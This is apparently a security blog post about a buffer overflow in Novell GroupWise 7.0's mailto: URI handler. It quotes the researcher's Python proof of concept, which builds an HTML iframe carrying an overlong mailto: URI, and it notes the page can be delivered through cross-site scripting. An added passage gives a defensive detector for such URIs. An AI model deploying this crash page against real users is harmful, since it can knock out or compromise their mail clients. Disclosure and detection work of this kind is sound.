Novell GroupWise 'mailto' URI handler buffer overflow vulnerability


Researcher Juan Pablo Lopez Yacubian has reported another URI abuse exploit.

From Security Focus:

Novell GroupWise is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

This issue affects GroupWise 7.0; other versions may also be affected.  

Hmm... When I mentioned URI abuse last week, I said there would be more, didn't I?

I'm working on a few myself. This one is pretty nasty since most browsers will accept mailto: URIs without any confirmation, meaning that if you get cross-site scripted and it forces a mailto URI to trigger, you're pwned.  Game over, thanks for playing.

The researcher attached code to Security Focus as a proof of concept, and here's the actual code from that Python file:

#!/usr/bin/python

a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w")
file.write(a)
file.close()

So, basically, this is a simple Python script that will create the exploit code for you, which you would then deploy using cross-site scripting or host on your own page, whatever.  The code does not contain a malicious payload; it's simply a proof of concept to cause the crash, so feel free to play with it if you'd like.
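On the defensive side, the two traits of that test page (a mailto: URI far longer than any real address, placed in a frame's src so it fires on render) can be checked for in HTML before it reaches a user. The following is an added example, not code from the original post or from the researcher; the 512-character cutoff and the names MailtoAuditor and audit_html are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed cutoff: the page states no safe length, so 512 is illustrative only.
MAX_MAILTO_LEN = 512
# (tag, attribute) pairs that navigate on render, as the PoC's iframe does.
AUTOLOAD = {("iframe", "src"), ("frame", "src")}
URL_ATTRS = {"src", "href"}


class MailtoAuditor(HTMLParser):
    """Record mailto: URIs that are oversized or fire without user action."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            uri = value.strip()
            if not uri.lower().startswith("mailto:"):
                continue
            reasons = []
            if len(uri) > MAX_MAILTO_LEN:
                reasons.append("oversized")
            if (tag, name) in AUTOLOAD:
                reasons.append("auto-triggered")
            if reasons:
                self.findings.append(
                    (self.getpos()[0], tag, name, len(uri), reasons))


def audit_html(html):
    """Return (line, tag, attr, uri_length, reasons) for each flagged URI."""
    auditor = MailtoAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample input with benign filler (not taken from the page).
SAMPLE = ("<a href='mailto:help@example.com'>contact</a>\n"
          "<iframe src='mailto:" + "x" * 2000 + "'></iframe>\n"
          "<a href='mailto:" + "y" * 600 + "@example.com'>long</a>\n")

if __name__ == "__main__":
    for finding in audit_html(SAMPLE):
        print(finding)
```

The same two checks translate directly into a mail-gateway or web-proxy content rule; the parser is only the convenient way to find URL attributes reliably.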

On to Juan Pablo, congrats to him.  He's on a roll.  This is the same researcher that earlier this week brought us another Trillian exploit.

-Nate
